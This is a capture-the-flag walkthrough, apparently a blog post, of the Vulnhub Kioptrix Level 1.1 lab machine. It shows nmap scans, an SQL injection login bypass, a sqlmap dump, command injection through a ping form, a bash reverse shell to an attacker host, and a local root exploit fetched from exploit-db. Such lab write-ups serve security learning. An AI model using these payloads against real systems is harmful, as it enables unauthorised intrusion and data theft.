Kioptrix: Level 1.1 Walkthrough

Kioptrix is a boot to root virtual machine which is hosted on Vulnhub.

Description of the challenge
“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.”

Identify the IP address of Kioptrix machine
Nmap Ping Scan

root@kali:~# nmap -sn 192.168.1.10/24
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-11 23:49 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0086s latency).
MAC Address: A0:63:91:F0:CC:4B (Netgear)
Nmap scan report for 192.168.1.2
Host is up (0.068s latency).
MAC Address: 70:70:0D:C9:AD:78 (Unknown)
Nmap scan report for 192.168.1.3
Host is up (0.072s latency).
MAC Address: B0:DF:3A:DE:59:08 (Samsung Electronics)
Nmap scan report for 192.168.1.7
Host is up (0.072s latency).
MAC Address: 70:77:81:C0:6C:33 (Hon Hai Precision Ind.)
Nmap scan report for 192.168.1.11
Host is up (0.00040s latency).
MAC Address: F4:0F:24:33:5E:D1 (Unknown)
Nmap scan report for 192.168.1.12
Host is up (0.16s latency).
MAC Address: 04:56:04:47:D4:5C (Unknown)
Nmap scan report for 192.168.1.13
Host is up (0.061s latency).
MAC Address: 68:37:E9:88:16:5F (Unknown)
Nmap scan report for 192.168.1.15
Host is up (0.15s latency).
MAC Address: 80:3F:5D:21:DC:73 (Winstars Technology)
Nmap scan report for 192.168.1.18
Host is up (0.00041s latency).
MAC Address: 08:00:27:00:D6:A2 (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.1.16
Host is up.
Nmap done: 256 IP addresses (10 hosts up) scanned in 2.83 seconds
root@kali:~#

Identify services running on Kioptrix

root@kali:~# nmap -sT -sV -A -O -v -p 1-65535 192.168.1.18
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-11 23:50 EDT
NSE: Loaded 140 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:50
Completed NSE at 23:50, 0.00s elapsed
Initiating NSE at 23:50
Completed NSE at 23:50, 0.00s elapsed
Initiating ARP Ping Scan at 23:50
Scanning 192.168.1.18 [1 port]
Completed ARP Ping Scan at 23:50, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:50
Completed Parallel DNS resolution of 1 host. at 23:50, 0.01s elapsed
Initiating Connect Scan at 23:50
Scanning 192.168.1.18 [65535 ports]
Discovered open port 22/tcp on 192.168.1.18
Discovered open port 111/tcp on 192.168.1.18
Discovered open port 443/tcp on 192.168.1.18
Discovered open port 3306/tcp on 192.168.1.18
Discovered open port 80/tcp on 192.168.1.18
Discovered open port 888/tcp on 192.168.1.18
Discovered open port 631/tcp on 192.168.1.18
Completed Connect Scan at 23:50, 3.10s elapsed (65535 total ports)
Initiating Service scan at 23:50
Scanning 7 services on 192.168.1.18
Completed Service scan at 23:50, 12.05s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.18
NSE: Script scanning 192.168.1.18.
Initiating NSE at 23:50
Completed NSE at 23:50, 1.51s elapsed
Initiating NSE at 23:50
Completed NSE at 23:50, 0.01s elapsed
Nmap scan report for 192.168.1.18
Host is up (0.0024s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 885/udp status
|_ 100024 1 888/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024.0
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after: 2010-10-08T00:10:47
| MD5: 01de 29f9 fbfb 2eb2 beaf e624 3157 090f
|_SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
|_ssl-date: 2017-05-12T07:50:54+00:00; +3h59m59s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
| Supported Methods: GET HEAD OPTIONS POST PUT
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
888/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 08:00:27:00:D6:A2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Uptime guess: 49.710 days (since Thu Mar 23 06:49:09 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=196 (Good luck!)
IP ID Sequence Generation: All zeros
Host script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
TRACEROUTE
HOP RTT ADDRESS
1 2.40 ms 192.168.1.18
NSE: Script Post-scanning.
Initiating NSE at 23:50
Completed NSE at 23:50, 0.00s elapsed
Initiating NSE at 23:50
Completed NSE at 23:50, 0.00s elapsed
Post-scan script results:
| clock-skew:
|_ 3h59m59s: Majority of systems scanned
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.82 seconds
Raw packets sent: 20 (1.626KB) | Rcvd: 16 (1.338KB)
root@kali:~#

Port 22 — Inspecting SSH — OpenSSH 3.9p1

root@kali:~# ssh kioptrix@192.168.1.18
The authenticity of host '192.168.1.18 (192.168.1.18)' can't be established.
RSA key fingerprint is SHA256:Zq28DlOuxHlI/iW0Vc2YhWhgPE3oB7O8kwSB4scwMzk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.18' (RSA) to the list of known hosts.
kioptrix@192.168.1.18's password:
Permission denied, please try again.
kioptrix@192.168.1.18's password:
Permission denied, please try again.
kioptrix@192.168.1.18's password:

No OpenSSH exploit matching our version was found. 21578.txt and 21579.txt seemed promising but required a lower version of OpenSSH.

Port 80/443 — Apache httpd 2.0.52 ((CentOS))

We are presented with an admin panel. Lets try basic SQL injection on the form

Username : admin
Password : ' or 1=1--

We could successfully bypassed the admin portal. Lets try to exploit the vulnerability using sqlmap and dump the database.

root@kali:~# sqlmap -u "http://192.168.1.18/index.php" --dbms=MySQL --dump --data "uname=test&psw=pass" --level=5 --risk=3

After successful login we are presented with an interface to ping ip addresses.

Try pinging www.google.com

Testing the form for command injection.

www.google.com;ls

Next step is getting a reverse shell using command injection.

;bash -i >& /dev/tcp/192.168.1.16/1234 0>&1
bash-3.00$ pwd
/var/www/html
bash-3.00$ ls
index.php
pingit.php
bash-3.00$ cat /etc/redhat-release
CentOS release 4.5 (Final)
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
bash-3.00$ cat /proc/version
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007
bash-3.00$

Search for a local privilege escalation for CentOS release 4.5

root@kali:~/Desktop/B2R# cp /usr/share/exploitdb/platforms/linux/local/9542.c .
root@kali:~/Desktop/B2R# python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...
192.168.1.18 - - [12/May/2017 02:35:02] "GET /9542 HTTP/1.0" 200 -
192.168.1.18 - - [12/May/2017 02:36:08] "GET /9542.c HTTP/1.0" 200 -

Finally we are root !!!

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.